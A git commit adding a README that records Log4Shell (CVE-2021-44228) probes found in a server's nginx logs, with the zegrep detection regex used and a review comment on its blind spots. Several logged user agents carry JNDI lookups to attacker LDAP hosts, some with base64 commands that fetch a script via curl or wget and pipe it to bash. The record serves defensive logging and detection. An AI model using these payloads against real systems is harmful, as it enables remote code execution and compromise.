Alex Berry 2021-12-12 11:18:26 +00:00
commit de3384e784
Signed by: alex
GPG Key ID: D5BB9F05EB47A31A

15
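--- /dev/null
+++ b/README.md
@@ -0,0 +1,15 @@
+'''
+# zegrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log/nginx/access.log*
+/var/log/nginx/access.log:167.99.36.245 - - [12/Dec/2021:00:14:07 +0000] "GET / HTTP/1.1" 301 178 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}" "86.20.42.145"
+/var/log/nginx/access.log:162.255.202.246 - - [12/Dec/2021:01:13:44 +0000] "GET / HTTP/1.0" 400 0 "-" "${jndi:ldap://172.111.48.30:1389/C}" "127.0.0.1"
+/var/log/nginx/access.log.1:5.157.38.50 - - [11/Dec/2021:12:06:06 +0000] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 301 178 "-" "curl/7.58.0" "86.20.42.145"
+/var/log/nginx/access.log.1:167.99.36.245 - - [11/Dec/2021:18:14:17 +0000] "GET / HTTP/1.1" 200 3410 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}" "86.20.42.145"
+/var/log/nginx/access.log.1:37.187.122.82 - - [11/Dec/2021:22:44:28 +0000] "GET / HTTP/1.0" 400 0 "-" "${jndi:ldap://172.111.48.30:1389/C}" "127.0.0.1"
+/var/log/nginx/access.log.2.gz:45.155.205.233 - - [10/Dec/2021:13:06:45 +0000] "GET / HTTP/1.1" 301 178 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ni4yMC40Mi4xNDU6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvODYuMjAuNDIuMTQ1OjgwKXxiYXNo}" "86.20.42.145"
+/var/log/nginx/access.log.2.gz:45.155.205.233 - - [10/Dec/2021:13:06:45 +0000] "GET / HTTP/1.1" 200 3410 "http://86.20.42.145:80/" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ni4yMC40Mi4xNDU6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvODYuMjAuNDIuMTQ1OjgwKXxiYXNo}" "gitea.helpitsbroken.co.uk"
+/var/log/nginx/access.log.2.gz:45.155.205.233 - - [10/Dec/2021:14:01:01 +0000] "GET / HTTP/1.1" 200 3404 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ni4yMC40Mi4xNDU6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0Lzg2LjIwLjQyLjE0NTo0NDMpfGJhc2g=}" "86.20.42.145"
+/var/log/nginx/access.log.2.gz:45.155.205.233 - - [10/Dec/2021:18:11:00 +0000] "GET / HTTP/1.1" 301 178 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ni4yMC40Mi4xNDU6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvODYuMjAuNDIuMTQ1OjgwKXxiYXNo}" "86.20.42.145"
+/var/log/nginx/access.log.2.gz:45.155.205.233 - - [10/Dec/2021:18:11:02 +0000] "GET / HTTP/1.1" 200 3409 "http://86.20.42.145:80/" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ni4yMC40Mi4xNDU6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvODYuMjAuNDIuMTQ1OjgwKXxiYXNo}" "gitea.helpitsbroken.co.uk"
+/var/log/nginx/access.log.2.gz:45.155.205.233 - - [10/Dec/2021:19:01:07 +0000] "GET / HTTP/1.1" 200 3405 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ni4yMC40Mi4xNDU6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0Lzg2LjIwLjQyLjE0NTo0NDMpfGJhc2g=}" "86.20.42.145"
+/var/log/nginx/access.log.2.gz:185.220.101.145 - - [10/Dec/2021:22:00:05 +0000] "GET / HTTP/1.1" 301 178 "-" "${jndi:ldap://5d79ce725a8f.bingsearchlib.com:39356/a}" "86.20.42.145"
+'''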
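Review bot: The README presents the `zegrep` output with no caveat on what the pattern can miss, so an empty result could be read as "no attempts". The expression on the second line only matches the literal, unobfuscated `${jndi:` prefix followed by `ldap`, `ldaps`, `rmi` or `dns`, and it only sees the fields this nginx log format records (request line, referer, user agent and the final quoted field, judging by the sample lines); lookups carried in other headers or in request bodies would not appear here at all. I would add a sentence under the listing such as `Note: this matches only the plain ${jndi:...} form in fields nginx logs; zero hits does not mean zero attempts, and the 200/301 codes are nginx's answer, not proof of what a Java backend did.` The file also opens and closes with `'''`, which Markdown does not treat as a code fence, so the `#` on the command line will probably render as a heading; three backticks on both lines would keep the listing verbatim.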